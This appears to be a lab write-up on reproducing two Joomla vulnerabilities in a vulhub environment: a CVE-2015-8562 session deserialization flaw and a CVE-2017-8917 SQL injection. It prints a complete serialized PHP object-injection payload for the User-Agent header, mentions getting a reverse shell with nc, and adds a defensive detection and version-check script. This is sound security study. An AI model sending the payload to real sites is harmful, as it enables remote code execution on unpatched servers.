Summary of Joomla Vulnerabilities

Table of contents

Introduction to Joomla

Environment build

CVE-2015-8562 deserialization vulnerability

CVE-2017-8917 SQL injection vulnerability


Introduction to Joomla

Joomla! is a world-renowned content management system. [1] Joomla! is written in PHP and uses a MySQL database. The latest version is 3.9.11. It runs on Linux, Windows, macOS and other platforms.

Environment build

  • Switch to the Joomla directory of vulhub and deploy the docker environment: cd /root/vulhub/joomla
  • Select the vulnerability you want to reproduce, switch into its directory, and run: docker-compose build, then docker-compose up -d
  • Visit the target website as described in the README.zh-cn.md file in that directory

CVE-2015-8562 deserialization vulnerability

The cause of the vulnerability

Before PHP 5.6.13, when PHP reads a stored session and one piece of data fails to deserialize, it skips that piece and goes on to deserialize the next one. Joomla, however, stores the session in the MySQL database with the utf8 character set (3 bytes per character at most). When 4-byte UTF-8 data is inserted, the stored session is truncated. The truncated data fails to deserialize, which triggers the deserialization vulnerability, and through a gadget chain in Joomla this leads to arbitrary code execution.

Affected version

  • Joomla 1.5.x, 2.x, and 3.x before 3.4.6
  • PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45

Vulnerability recurrence

1. First, visit the target homepage without a User-Agent header and write down the Cookie returned by the server.

2. Then set the User-Agent to the following content, and set the Cookie to the value the target website just returned.

123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}

3. Then use Burp's Repeater module to construct the following payload and send it. This first request stores the data in the MySQL database.

4. Then send the request once more, and we can see that the code is executed.

5. We can also use the script written by another researcher to get a reverse shell.

6. nc receives the connection from the target server and gets a bash shell.
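As an added defender-side example, not part of the original post and not code from vulhub or the Joomla project, the script below checks the two conditions this write-up relies on: it scans request headers for the PHP serialized-object signature (the O:21:"JDatabaseDriverMysqli" prefix that appears in the User-Agent above) and for 4-byte UTF-8 characters, which a MySQL utf8 (3-byte) session column truncates, and it compares Joomla and PHP versions against the affected ranges listed above. The sample requests are constructed, the function names are mine, and the assumption that any PHP 7.0 or later release carries the session fix is mine as well.

```python
import re

# Constructed sample requests, not captured traffic. The third entry carries
# the serialized-object signature from the CVE-2015-8562 payload; the fourth
# carries a 4-byte UTF-8 character (U+1F600), the kind that a MySQL "utf8"
# column truncates as described in the cause section.
SAMPLE_REQUESTS = [
    {"user_agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/68.0", "x_forwarded_for": ""},
    {"user_agent": "curl/7.64.1", "x_forwarded_for": "203.0.113.7"},
    {"user_agent": '}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\x00\x00\x00a";', "x_forwarded_for": ""},
    {"user_agent": "Mozilla/5.0 \U0001F600 test", "x_forwarded_for": ""},
]

# PHP serialized object header: O:<name length>:"<ClassName>":<field count>:{
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')
# Any code point above U+FFFF is encoded as 4 bytes in UTF-8.
FOUR_BYTE_UTF8 = re.compile(r'[\U00010000-\U0010FFFF]')


def classify_header(value):
    """Return the list of reasons a header value looks suspicious (empty if clean)."""
    reasons = []
    if SERIALIZED_OBJECT.search(value):
        reasons.append("php-serialized-object")
    if FOUR_BYTE_UTF8.search(value):
        reasons.append("4-byte-utf8")
    return reasons


def scan_requests(requests, headers=("user_agent", "x_forwarded_for")):
    """Scan the headers Joomla copies into the session; return (index, header, reasons)."""
    findings = []
    for idx, req in enumerate(requests):
        for name in headers:
            reasons = classify_header(req.get(name, ""))
            if reasons:
                findings.append((idx, name, reasons))
    return findings


def _version_tuple(version):
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts + (0,) * (3 - len(parts))


# First fixed release per PHP branch, from the affected-version list above.
PHP_FIXED = {(5, 4): (5, 4, 45), (5, 5): (5, 5, 29), (5, 6): (5, 6, 13)}


def php_has_session_fix(version):
    """True if this PHP release no longer skips broken session pieces (assumption: 7.0+ is fixed)."""
    parts = _version_tuple(version)
    fixed = PHP_FIXED.get(parts[:2])
    if fixed is None:
        # Branches older than 5.4 never received the fix; 7.0 and later ship with it.
        return parts >= (7, 0, 0)
    return parts >= fixed


def joomla_has_fix(version):
    """True for Joomla 3.4.6 or later; 1.5.x, 2.x and earlier 3.x are affected."""
    return _version_tuple(version) >= (3, 4, 6)


if __name__ == "__main__":
    for idx, name, reasons in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: header {name} flagged: {', '.join(reasons)}")
    print("PHP 5.6.12 fixed:", php_has_session_fix("5.6.12"))
    print("Joomla 3.4.6 fixed:", joomla_has_fix("3.4.6"))
```

Running the scan over the constructed requests flags the third and fourth entries only, which is the pair of signals worth alerting on in web-server or WAF logs: a serialized PHP object in a header Joomla copies into the session, and 4-byte UTF-8 in the same headers on a site whose session table still uses the 3-byte utf8 character set. The version checks are a quick triage aid for the ranges given above, not a substitute for patching.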

CVE-2017-8917 SQL injection vulnerability

Affected version

  • Joomla 3.7.0

Vulnerability recurrence

payload

Then access the payload with the browser, and the page reports an error, confirming the injection.



Origin blog.csdn.net/smli_ng/article/details/115799954